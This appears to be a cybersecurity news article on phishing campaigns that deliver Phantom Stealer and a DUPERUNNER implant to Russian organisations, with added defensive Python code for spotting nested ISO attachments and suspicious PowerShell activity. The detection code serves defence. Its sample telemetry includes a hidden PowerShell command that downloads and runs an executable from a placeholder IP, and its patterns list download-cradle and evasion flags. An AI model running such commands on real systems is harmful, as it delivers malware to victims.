Cybersecurity researchers have revealed an active phishing campaign targeting various sectors in Russia using malicious ISO optical disc images to deliver Phantom Stealer.
The operation, named MoneyMount-ISO by Seqrite Labs, primarily focuses on finance and accounting entities. Secondary targets include procurement, legal, and payroll departments.
The campaign uses fake payment confirmation lures to deliver the information-stealing malware through a multi-stage attachment chain.
The infection chain starts with a phishing email dressed up as a financial communication that urges the recipient to confirm a bank transfer. The attachment is a ZIP archive containing an ISO file, which Windows mounts as a virtual CD drive when opened; disc images are a favoured container because files inside a mounted image have historically escaped Mark-of-the-Web checks. Inside the image is an executable that launches Phantom Stealer through an embedded DLL named CreativeAI.dll.
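To make the ZIP-then-ISO attachment chain concrete for a mail-gateway or sandbox pre-filter, here is an added example (not code from Seqrite Labs or from the original article) that unpacks a ZIP in memory, flags nested ISO9660 images by their volume-descriptor signature rather than by extension, and carves the image for PE headers. The ZIP, the ISO blob and the file names are constructed inline and are assumptions; no real lure is reproduced.

```python
import io
import re
import zipfile

ISO_SIG = b"CD001"          # ISO9660 standard identifier
ISO_SIG_OFFSET = 0x8001     # primary volume descriptor at sector 16 (2048-byte sectors), id at +1


def is_iso9660(data: bytes) -> bool:
    """Detect an ISO9660 image by signature, so a renamed .iso is still caught."""
    return data[ISO_SIG_OFFSET:ISO_SIG_OFFSET + len(ISO_SIG)] == ISO_SIG


def find_pe_offsets(data: bytes) -> list:
    """Carve for PE images: an 'MZ' header whose e_lfanew points at a 'PE\\0\\0' signature."""
    hits = []
    for m in re.finditer(rb"MZ", data):
        off = m.start()
        if off + 0x40 > len(data):
            continue
        e_lfanew = int.from_bytes(data[off + 0x3C:off + 0x40], "little")
        if 0x40 <= e_lfanew < 0x1000 and data[off + e_lfanew:off + e_lfanew + 4] == b"PE\0\0":
            hits.append(off)
    return hits


def inspect_zip(zip_bytes: bytes) -> dict:
    """Return nested-ISO findings and a verdict for one ZIP attachment."""
    findings = {"nested_iso": [], "pe_in_iso": {}, "verdict": "clean"}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            payload = zf.read(info.filename)
            if info.filename.lower().endswith((".iso", ".img")) or is_iso9660(payload):
                findings["nested_iso"].append(info.filename)
                pes = find_pe_offsets(payload)
                if pes:
                    findings["pe_in_iso"][info.filename] = pes
    if findings["pe_in_iso"]:
        findings["verdict"] = "block"        # disc image with an executable inside
    elif findings["nested_iso"]:
        findings["verdict"] = "quarantine"   # disc image, contents unknown: hold for review
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample, not a real lure: a ZIP holding a minimal ISO9660-shaped blob
    that carries a fake PE stub, plus a harmless text file."""
    iso = bytearray(0x9000)
    iso[0x8000] = 1                                  # volume descriptor type 1 = primary
    iso[ISO_SIG_OFFSET:ISO_SIG_OFFSET + 5] = ISO_SIG
    pe = bytearray(0x100)
    pe[0:2] = b"MZ"
    pe[0x3C:0x40] = (0x80).to_bytes(4, "little")     # e_lfanew -> PE header
    pe[0x80:0x84] = b"PE\0\0"
    iso[0x8800:0x8800 + len(pe)] = pe
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("payment_confirmation.iso", bytes(iso))   # file name is an assumption
        zf.writestr("readme.txt", b"please confirm the transfer")
    return buf.getvalue()


if __name__ == "__main__":
    print(inspect_zip(build_sample_zip()))
```

The signature check matters more than the extension check: a gateway that only blocks `*.iso` misses a renamed image, while Windows still mounts it by content. Carving for `MZ`/`PE` inside the image is a cheap heuristic; a full ISO9660 directory walk would also recover the embedded file names.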
Phantom Stealer is designed to extract data from cryptocurrency wallet browser extensions and desktop apps. It can also steal files, Discord authentication tokens, and browser-related passwords, cookies, and credit card details. The malware monitors clipboard content and logs keystrokes while performing checks to detect virtual or analysis environments. If it detects such an environment, it stops running. Stolen data is sent to attackers via a Telegram bot, a Discord webhook, or an FTP server.
In recent months, Russian organizations have also faced a campaign called DupeHike, attributed to the threat group UNG0902. It targets human resources and payroll departments with lures about bonuses or internal policies: a ZIP file containing a decoy PDF and an LNK shortcut. The LNK runs PowerShell to download an implant called DUPERUNNER, which opens the decoy PDF while injecting an AdaptixC2 command-and-control beacon into legitimate Windows processes such as explorer.exe or notepad.exe.
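The DupeHike chain leaves two lineage artefacts a defender can key on: a PowerShell child of explorer.exe carrying a download cradle (the LNK itself is not visible in process telemetry, so the explorer-to-PowerShell lineage is the proxy), and a remote thread created in explorer.exe or notepad.exe from a binary outside the Windows directory. The following is an added example, not part of the original article or of any vendor's detection content, that runs those two rules over constructed Sysmon-style event lines written in a simplified key=value form; the host names, paths and the 198.51.100.7 address are made up.

```python
import re

# Constructed Sysmon-style events (EventID 1 = process create, 8 = CreateRemoteThread); not real telemetry.
SAMPLE_EVENTS = [
    r'EventID=1 UtcTime=2025-09-02T08:14:03 ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe -nop -w hidden -c iwr http://198.51.100.7/bonus.exe '
    r'-OutFile $env:TEMP\bonus.exe; start $env:TEMP\bonus.exe"',
    r'EventID=8 UtcTime=2025-09-02T08:14:09 SourceImage=C:\Users\ivanova\AppData\Local\Temp\bonus.exe '
    r'TargetImage=C:\Windows\explorer.exe',
    r'EventID=1 UtcTime=2025-09-02T08:20:11 ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell.exe -File C:\scripts\backup.ps1"',
    r'EventID=8 UtcTime=2025-09-02T08:30:00 SourceImage=C:\Windows\System32\csrss.exe '
    r'TargetImage=C:\Windows\explorer.exe',
]

FIELD = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-WebRequest|\biwr\b|\birm\b|Invoke-RestMethod|DownloadString|DownloadFile|"
    r"Start-BitsTransfer|\bcurl\b|-e(?:nc|ncodedcommand)?\b",
    re.IGNORECASE,
)
EVASION_FLAGS = re.compile(
    r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|-executionpolicy\s+bypass",
    re.IGNORECASE,
)
INJECTION_TARGETS = {"explorer.exe", "notepad.exe"}


def parse_event(line: str) -> dict:
    """Parse one key=value line; quoted values may contain spaces."""
    return {k: quoted or bare for k, quoted, bare in FIELD.findall(line)}


def basename(path: str) -> str:
    return path.lower().rsplit("\\", 1)[-1]


def evaluate(ev: dict) -> list:
    """Return the rule names that fire for a single parsed event."""
    hits = []
    if ev.get("EventID") == "1":
        if basename(ev.get("ParentImage", "")) == "explorer.exe" and \
                basename(ev.get("Image", "")) in {"powershell.exe", "pwsh.exe"}:
            cmd = ev.get("CommandLine", "")
            if DOWNLOAD_CRADLE.search(cmd):
                hits.append("lnk_powershell_download_cradle")
            if EVASION_FLAGS.search(cmd):
                hits.append("powershell_evasion_flags")
    elif ev.get("EventID") == "8":
        target = basename(ev.get("TargetImage", ""))
        source = ev.get("SourceImage", "").lower()
        # A remote thread into explorer/notepad from outside C:\Windows is the injection step.
        if target in INJECTION_TARGETS and not source.startswith("c:\\windows\\"):
            hits.append("remote_thread_into_" + target.rsplit(".", 1)[0])
    return hits


def scan(lines) -> list:
    """Return (UtcTime, [rules]) for every event that fires at least one rule."""
    results = []
    for line in lines:
        ev = parse_event(line)
        hits = evaluate(ev)
        if hits:
            results.append((ev.get("UtcTime"), hits))
    return results


if __name__ == "__main__":
    for when, rules in scan(SAMPLE_EVENTS):
        print(when, ", ".join(rules))
```

The benign backup script launched from the desktop and the system-owned remote thread from csrss.exe produce no alerts, which is the point of pairing the lineage check with the command-line and source-path conditions rather than alerting on every explorer-spawned PowerShell.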
Other phishing efforts have targeted the Russian aerospace, legal, and finance sectors to distribute tools like Cobalt Strike, Formbook, and DarkWatchman. These tools allow for data theft and remote control of infected systems. Attackers often use the email servers of compromised Russian companies to send these phishing messages.
The French cybersecurity firm Intrinsec has linked some of these intrusions to hacktivists aligned with Ukrainian interests. These campaigns, detected between June and September 2025, aim to compromise entities cooperating with the Russian military. Some of these attacks redirect users to phishing login pages designed to steal credentials for Microsoft Outlook and the aerospace company Bureau 1440.